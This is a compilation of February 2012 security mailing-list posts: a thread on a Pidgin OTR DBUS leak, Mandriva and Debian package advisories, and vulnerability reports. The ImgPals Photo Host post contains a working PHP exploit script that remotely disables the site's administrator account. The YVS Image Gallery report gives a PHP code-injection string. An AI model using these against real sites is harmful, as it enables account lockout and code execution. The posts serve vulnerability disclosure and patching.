Re: [Full-disclosure] pidgin OTR information leakage

[Jeffrey Walton]

On Mon, Feb 27, 2012 at 3:21 PM, Rich Pieri rati...@mit.edu wrote:
 On Feb 27, 2012, at 2:37 PM, Michele Orru wrote:
 I think you didn't understood the content of the advisory.
 If there are 10 non-root users in an Ubuntu machine for example,
 if user 1 is using pidgin with OTR compiled with DBUS, then user 2 to 10
 can see what user 1 pidgin conversation.


 This is not what the OP or CVE describe:

 plaintext. This makes it possible for attackers that have gained
 user-level access on a host, to listen in on private conversations
 associated with the victim account.

 Which I read as: if I compromise user1's account then I can snoop user1's 
 DBUS sessions.  It says nothing about me being able to snoop user2's 
 sessions.  The leading phrase about attackers gaining user-level access 
 implies that legitimate users on a system are not a relevant issue.

I tend to agree with you, and question if that is in fact true (it may
well be, my apologies in advance). DBUS is on my list of things to
probe, prod, and attatck due to data sharing.

But I'd be really surprised if data was available across distinct user
sessions. Unix/Linux are usually very good a separating processes and
sessions so that data does not comingle.

Jeff

Re: [oss-security] Case YVS Image Gallery

[Henri Salo]

On Mon, Feb 27, 2012 at 09:31:52AM -0700, Kurt Seifried wrote:
 If you make a list of issues (e.g. XSS, CSRF, etc) with the code
 examples I can assign the various blocks of issues CVEs.

1. ./administration/install.php opens ../functions/db_connect.php and writes to 
file without input validation leading to PHP code injection with all variables 
if any contains for example: ;} ? ?php print(Hello World); exit() ?

Note that install guide in web says: after instalation is complete, delete the 
install.php file and install.php does not need permissions.

2. ./administration/create_album.php does not have proper input validation 
leading to stored XSS, which can only be added by administrators, but I don't 
think this as a limit after other vulnerabilities. XSS will also be shown to 
normal users (mainpage).

- Henri Salo

Re: [Full-disclosure] pidgin OTR information leakage

[Dimitris Glynos]

On 02/27/2012 11:23 PM, devn...@vonage.com wrote:
 
 I believe that clarification is in order.

Indeed it is. The original post mentions a same-user attack
vector which is very misleading as to what the real problem here is.

And it boils down to this:

Once a process sends private info over DBUS there is no way
to control where this ends up (which apps are the qualified receivers)
or what the receivers do with it. So, if for example the user
selects not to log OTR plaintext (so that this sensitive information
doesn't touch the hard drive) another application on the other end
of DBUS might choose to do something different (and not by malicious
intent). There is no way to enforce the same security policy on the
sender and the receivers.

How this could be exploited by attackers or what forensic evidence
DBUS snooping leaves are of much less importance than the above
privacy issue.

There is a very good discussion on the pidgin ticket page:
http://developer.pidgin.im/ticket/14830

Also, I've made some updates to our post, to make it clearer
as to what this issue is about:

http://census-labs.com/news/2012/02/25/libpurple-otr-info-leak/

If there are still questions, I'll be happy to answer them.

Hope this clarifies things a bit,

Dimitris

Re: [Full-disclosure] pidgin OTR information leakage

[Dimitris Glynos]

On 02/28/2012 12:14 AM, Dimitris Glynos wrote:
 On 02/27/2012 11:23 PM, devn...@vonage.com wrote:

 I believe that clarification is in order.
 
 Indeed it is. The original post mentions a same-user attack
 vector which is very misleading as to what the real problem here is.
 
 And it boils down to this:
 
 Once a process sends private info over DBUS there is no way
 to control where this ends up (which apps are the qualified receivers)
 or what the receivers do with it.

This should be:

Once a process *broadcasts* private info over DBUS there is no way
to control where this ends up (which apps are the qualified receivers)
or what the receivers do with it.

 So, if for example the user
 selects not to log OTR plaintext (so that this sensitive information
 doesn't touch the hard drive) another application on the other end
 of DBUS might choose to do something different (and not by malicious
 intent). There is no way to enforce the same security policy on the
 sender and the receivers.
 
 How this could be exploited by attackers or what forensic evidence
 DBUS snooping leaves are of much less importance than the above
 privacy issue.
 
 There is a very good discussion on the pidgin ticket page:
 http://developer.pidgin.im/ticket/14830
 
 Also, I've made some updates to our post, to make it clearer
 as to what this issue is about:
 
 http://census-labs.com/news/2012/02/25/libpurple-otr-info-leak/
 
 If there are still questions, I'll be happy to answer them.
 
 Hope this clarifies things a bit,
 
 Dimitris

[ MDVSA-2012:023-1 ] libvpx

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2012:023-1
 http://www.mandriva.com/security/
 ___

 Package : libvpx
 Date: February 28, 2012
 Affected: 2010.1, 2011.
 ___

 Problem Description:

 A vulnerability has been found and corrected in libvpx:
 
 VP8 Codec SDK (libvpx) before 1.0.0 Duclair allows remote attackers
 to cause a denial of service (application crash) via (1) unspecified
 corrupt input or (2) by starting decoding from a P-frame, which
 triggers an out-of-bounds read, related to the clamping of motion
 vectors in SPLITMV blocks (CVE-2012-0823).
 
 The updated packages have been patched to correct this issue.

 Update:

 This is a symbolic advisory correction because there was a clash with
 MDVSA-2012:023 that addressed libxml2.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0823
 ___

 Updated Packages:

 Mandriva Linux 2010.1:
 80595bcf9605087872ef9e76988c06fb  
2010.1/i586/libvpx0-0.9.7-0.2mdv2010.2.i586.rpm
 6a39a655e52324d5454df93c54803e1d  
2010.1/i586/libvpx-devel-0.9.7-0.2mdv2010.2.i586.rpm
 36669f19119055daa1c65a4341bf00ee  
2010.1/i586/libvpx-utils-0.9.7-0.2mdv2010.2.i586.rpm 
 efbc2e9f8338a146ed9bb4a8133ee3d0  
2010.1/SRPMS/libvpx-0.9.7-0.2mdv2010.2.src.rpm

 Mandriva Linux 2010.1/X86_64:
 7d42ba1449797b928a025d82fbbf2a65  
2010.1/x86_64/lib64vpx0-0.9.7-0.2mdv2010.2.x86_64.rpm
 05101dfd30ef938952f61705a1394705  
2010.1/x86_64/lib64vpx-devel-0.9.7-0.2mdv2010.2.x86_64.rpm
 20e10865900d2a24d58b7677098057e8  
2010.1/x86_64/libvpx-utils-0.9.7-0.2mdv2010.2.x86_64.rpm 
 efbc2e9f8338a146ed9bb4a8133ee3d0  
2010.1/SRPMS/libvpx-0.9.7-0.2mdv2010.2.src.rpm

 Mandriva Linux 2011:
 e77c03974267d8b697fce1944dc7627b  
2011/i586/libvpx0-0.9.7-0.2-mdv2011.0.i586.rpm
 e52f1469cdf005a7a8e2855a65bfde2f  
2011/i586/libvpx-devel-0.9.7-0.2-mdv2011.0.i586.rpm
 6fbe1b807480c8c86d482cef51f5cc7d  
2011/i586/libvpx-utils-0.9.7-0.2-mdv2011.0.i586.rpm 
 e274966b396ce1cb66aa4b01f2bea88e  2011/SRPMS/libvpx-0.9.7-0.2.src.rpm

 Mandriva Linux 2011/X86_64:
 81c2210c4f37421a22a877599304b5a4  
2011/x86_64/lib64vpx0-0.9.7-0.2-mdv2011.0.x86_64.rpm
 02f987fb0972c5b45a91a3d02060923f  
2011/x86_64/lib64vpx-devel-0.9.7-0.2-mdv2011.0.x86_64.rpm
 a7d46c97d8294236422b37a8359ba64d  
2011/x86_64/libvpx-utils-0.9.7-0.2-mdv2011.0.x86_64.rpm 
 e274966b396ce1cb66aa4b01f2bea88e  2011/SRPMS/libvpx-0.9.7-0.2.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)

iD8DBQFPTL06mqjQ0CJFipgRAmSwAKC3SrXDSm5poitKzRLbK3HdV0s5XwCgqOwj
GCMzTwqDabkLHPmw9/sT7lk=
=XrZF
-END PGP SIGNATURE-

ImgPals Photo Host Version 1.0 Admin Account Disactivation

[CorryL]

-=[ADVISORY---]=-

ImgPals Photo Host Version 1.0 STABLE

Author: Corrado Liotta Aka CorryL [corry...@gmail.com]
-=[---]=-


-=[+] Application: ImgPals Photo Host
-=[+] Version: 1.0 STABLE
-=[+] Vendor's URL: http://www.imgpals.com/forum/
-=[+] Platform: Windows\Linux\Unix
-=[+] Bug type: Admin Account Disactivation
-=[+] Exploitation: Remote
-=[-]
-=[+] Author: Corrado Liotta Aka CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Facebook: https://www.facebook.com/CorryL
-=[+] Twitter: https://twitter.com/#!/CorradoLiotta
-=[+] Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611

...::[ Descriprion ]::..

I released the ImgPals Photo Host Version 1.0 STABLE


Features Include:

* Easy Install
* Full README file included
* Full Control Panel to control your site
* User Side Features
  o Multiple JQuery Uploads
  o Create and Edit Photo Albums
  o Make Albums Public or Private
  o Describe Albums and Photos
  o Move, Delete, Rename, Rotate, Rate, Comment, and Tag Photos
  o Add Friends
  o Chat with Friends
  o Update people with status wall posting
  o Manage Profile
  o Profile Avatar Uploads
  o Private Messaging
* And much more, be sure to check out the Demo


...::[ Bug ]::..

A attaker can remotely disable the account from administratore not
allowing the same to be able to access the site

...::[ Proof Of Concept ]::..

 if ($_GET['a'] == 'app0'){
 $sqlapprove = mysql_query(UPDATE members SET
approved = '0' WHERE id = '.$_GET['u'].');

by sending the command approve.php? u = a = 1  app0 a attaker can
disable the Administrator account.

...::[ Exploit ]::..

#!/usr/bin/php -f
?php


//Coded by Corrado Liotta For educational purpose only
//use php exploit.php server app0 or app1
//use app0 for admin account off
//use app1 for admin account on

$target = $argv[1];
$power = $argv[2]

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_URL, http://$target/approve.php?u=1a=$power;);
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, Mozilla/4.0 (compatible; MSIE
5.01; Windows NT 5.0));
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, /tmp/cookie_$target);
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);

echo $buf;
?

[ MDVSA-2012:025 ] samba

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2012:025
 http://www.mandriva.com/security/
 ___

 Package : samba
 Date: February 28, 2012
 Affected: Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been found and corrected in samba:
 
 Heap-based buffer overflow in process.c in smbd in Samba allows remote
 attackers to cause a denial of service (daemon crash) or possibly
 execute arbitrary code via a Batched (aka AndX) request that triggers
 infinite recursion (CVE-2012-0870).
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0870
 ___

 Updated Packages:

 Mandriva Enterprise Server 5:
 f1c5c40a39960bf0be8b4f7b0eb07f1c  
mes5/i586/libnetapi0-3.3.12-0.8mdvmes5.2.i586.rpm
 c09851ea48666122ce67fb3bb5d863b7  
mes5/i586/libnetapi-devel-3.3.12-0.8mdvmes5.2.i586.rpm
 574874125ee63e520110e73158fa1c53  
mes5/i586/libsmbclient0-3.3.12-0.8mdvmes5.2.i586.rpm
 ed39a5badbcb3dff984d099d995e4654  
mes5/i586/libsmbclient0-devel-3.3.12-0.8mdvmes5.2.i586.rpm
 37f6c8edc6af9e4439fe1cfa74162fd4  
mes5/i586/libsmbclient0-static-devel-3.3.12-0.8mdvmes5.2.i586.rpm
 e06527be75deb64802f8bfa4c266f9bc  
mes5/i586/libsmbsharemodes0-3.3.12-0.8mdvmes5.2.i586.rpm
 9926b5aa94649fe5e4563d7d30eea094  
mes5/i586/libsmbsharemodes-devel-3.3.12-0.8mdvmes5.2.i586.rpm
 13ed1d18924705829149f27c89cff483  
mes5/i586/libtalloc1-3.3.12-0.8mdvmes5.2.i586.rpm
 0dcc0cadaff5d3e9e9b26a4aa76320b9  
mes5/i586/libtalloc-devel-3.3.12-0.8mdvmes5.2.i586.rpm
 f66dc353d8f7cc28d9e9922bc731bd06  
mes5/i586/libtdb1-3.3.12-0.8mdvmes5.2.i586.rpm
 87689dca4f04ccc56c8b7e2958f870a5  
mes5/i586/libtdb-devel-3.3.12-0.8mdvmes5.2.i586.rpm
 eac4493389bdd505786b2a813800ec21  
mes5/i586/libwbclient0-3.3.12-0.8mdvmes5.2.i586.rpm
 0a4d9665399a405ec33352bac8b085d7  
mes5/i586/libwbclient-devel-3.3.12-0.8mdvmes5.2.i586.rpm
 31d01f8f5ac236bdeb5da6c0b1103c26  
mes5/i586/mount-cifs-3.3.12-0.8mdvmes5.2.i586.rpm
 4d65a41c7adf287f33146cb51976c12f  
mes5/i586/nss_wins-3.3.12-0.8mdvmes5.2.i586.rpm
 95851e4895bebace6a800c21411c2c98  
mes5/i586/samba-client-3.3.12-0.8mdvmes5.2.i586.rpm
 615ae2342634aa724e233fe7c38e1021  
mes5/i586/samba-common-3.3.12-0.8mdvmes5.2.i586.rpm
 593f4559e2e7927c3d2be07c75f69fc2  
mes5/i586/samba-doc-3.3.12-0.8mdvmes5.2.i586.rpm
 082b8b10f48f87102f5f4e5734192274  
mes5/i586/samba-server-3.3.12-0.8mdvmes5.2.i586.rpm
 671a8293f5c9970eff7f41a382ce1de8  
mes5/i586/samba-swat-3.3.12-0.8mdvmes5.2.i586.rpm
 d0826b2d50dd03a8a2def0ab8217a10b  
mes5/i586/samba-winbind-3.3.12-0.8mdvmes5.2.i586.rpm 
 e63162eb725a3c786a9d6ce6e3ffa834  mes5/SRPMS/samba-3.3.12-0.8mdvmes5.2.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 08052ae7f504d3afebc2592c4563cb26  
mes5/x86_64/lib64netapi0-3.3.12-0.8mdvmes5.2.x86_64.rpm
 959b440b7a52de85774c7826c23e5a0d  
mes5/x86_64/lib64netapi-devel-3.3.12-0.8mdvmes5.2.x86_64.rpm
 4fbf3c6550bbd781101b19a5f59db31f  
mes5/x86_64/lib64smbclient0-3.3.12-0.8mdvmes5.2.x86_64.rpm
 fa0e52cf4f492cb5d991ca5305f4eca7  
mes5/x86_64/lib64smbclient0-devel-3.3.12-0.8mdvmes5.2.x86_64.rpm
 3aab55b5470b2dd3fe21bc22aac57881  
mes5/x86_64/lib64smbclient0-static-devel-3.3.12-0.8mdvmes5.2.x86_64.rpm
 62faaa06906b9b03f73d130c30841e24  
mes5/x86_64/lib64smbsharemodes0-3.3.12-0.8mdvmes5.2.x86_64.rpm
 2989b58fbd3b45bc9f59c252c694970f  
mes5/x86_64/lib64smbsharemodes-devel-3.3.12-0.8mdvmes5.2.x86_64.rpm
 7b02247f56fbae2c39148fbbdb2a9753  
mes5/x86_64/lib64talloc1-3.3.12-0.8mdvmes5.2.x86_64.rpm
 c06c34fbdf4472157ce75f438c8975fe  
mes5/x86_64/lib64talloc-devel-3.3.12-0.8mdvmes5.2.x86_64.rpm
 05412945bb2a1b2be22aab619395366e  
mes5/x86_64/lib64tdb1-3.3.12-0.8mdvmes5.2.x86_64.rpm
 a5d3e798398970a92129d182766049ab  
mes5/x86_64/lib64tdb-devel-3.3.12-0.8mdvmes5.2.x86_64.rpm
 fa4659a2d3591b354ed48fe4780e318a  
mes5/x86_64/lib64wbclient0-3.3.12-0.8mdvmes5.2.x86_64.rpm
 a647ebd6ed3d00f8e0cf32db8deddd89  
mes5/x86_64/lib64wbclient-devel-3.3.12-0.8mdvmes5.2.x86_64.rpm
 5075846b37b482eee78d1390284d221f  
mes5/x86_64/mount-cifs-3.3.12-0.8mdvmes5.2.x86_64.rpm
 08968a5c3682f2af4dab4433d3c4906c  
mes5/x86_64/nss_wins-3.3.12-0.8mdvmes5.2.x86_64.rpm
 1f391d0c654c0efa93a4a9b90ff8abad  
mes5/x86_64/samba-client-3.3.12-0.8mdvmes5.2.x86_64.rpm
 9d374a84dab147dd3a7e20f38032740f  
mes5/x86_64/samba-common-3.3.12-0.8mdvmes5.2.x86_64.rpm
 fbc801397a2f7b94b06397aed9e037a8  
mes5/x86_64/samba-doc-3.3.12-0.8mdvmes5.2.x86_64.rpm
 39fde58a25e8180b574cf6e5a8f7e432  
mes5/x86_64/samba-server-3.3.12-0.8mdvmes5.2.x86_64.rpm
 d9f108c12ade5b0f8905cb453cdb99dc  

[SECURITY] [DSA 2420-1] openjdk-6 security update

[Florian Weimer]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2420-1   secur...@debian.org
http://www.debian.org/security/Florian Weimer
February 28, 2012  http://www.debian.org/security/faq
- -

Package: openjdk-6
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2011-3377 CVE-2011-3563 CVE-2011-5035 CVE-2012-0497
 CVE-2012-0501 CVE-2012-0502 CVE-2012-0503 CVE-2012-0505
 CVE-2012-0506 CVE-2012-0507

Several vulnerabilities have been discovered in OpenJDK, an
implementation of the Oracle Java platform.

CVE-2011-3377
The Iced Tea browser plugin included in the openjdk-6 package
does not properly enforce the Same Origin Policy on web content
served under a domain name which has a common suffix with the
required domain name.

CVE-2011-3563
The Java Sound component did not properly check for array
boundaries.  A malicious input or an untrusted Java application
or applet could use this flaw to cause Java Virtual Machine to
crash or disclose portion of its memory.

CVE-2011-5035
The OpenJDK embedded web server did not guard against an
excessive number of a request parameters, leading to a denial
of service vulnerability involving hash collisions.

CVE-2012-0497
It was discovered that Java2D did not properly check graphics
rendering objects before passing them to the native renderer.
This could lead to JVM crash or Java sandbox bypass.

CVE-2012-0501
The ZIP central directory parser used by java.util.zip.ZipFile
entered an infinite recursion in native code when processing a
crafted ZIP file, leading to a denial of service.

CVE-2012-0502
A flaw was found in the AWT KeyboardFocusManager class that
could allow untrusted Java applets to acquire keyboard focus
and possibly steal sensitive information.

CVE-2012-0503
The java.util.TimeZone.setDefault() method lacked a security
manager invocation, allowing an untrusted Java application or
applet to set a new default time zone.

CVE-2012-0505
The Java serialization code leaked references to serialization
exceptions, possibly leaking critical objects to untrusted
code in Java applets and applications.

CVE-2012-0506
It was discovered that CORBA implementation in Java did not
properly protect repository identifiers (that can be obtained
using _ids() method) on certain Corba objects.  This could
have been used to perform modification of the data that should
have been immutable.

CVE-2012-0507
The AtomicReferenceArray class implementation did not properly
check if the array is of an expected Object[] type.  A
malicious Java application or applet could use this flaw to
cause Java Virtual Machine to crash or bypass Java sandbox
restrictions

For the stable distribution (squeeze), these problems have been fixed in
version 6b18-1.8.13-0+squeeze1.

For the testing distribution (wheezy) and the unstable distribution
(sid), these problems have been fixed in version 6b24-1.11.1-1.

We recommend that you upgrade your openjdk-6 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.10 (GNU/Linux)

iQEcBAEBAgAGBQJPTTmbAAoJEL97/wQC1SS+lqwH/1F5hffrk0ciMajdYvUuPgs5
tDeo+Sq6WwZqSYJFYsXDyyxtLProzR9Szi4n0O5942nUqRV6UtzxsvWPoQVm+gVF
c9waYDogwr7X6KNUdhLoWRwR0wZm5lryLPUNPx1AGJd0CstxJJ3cFX243m2F0+03
BuDU4QuwMliS5YpvEJ3JUFA4zZ3ETwa033poeOD9Pkh5Y8wfbaiYM6/0yvI/lIDC
EmszvApi8iM/Q6s5olvFgHpv+J2aiLR6IYmP8wWJLd2vvGpukoix06U/eqF0NirT
ilZaZmw1YGultG34yWP95TaF5+AOYgkm5g80SeHX2B3iL2u1cd1xklo6i2eGVBE=
=jUub
-END PGP SIGNATURE-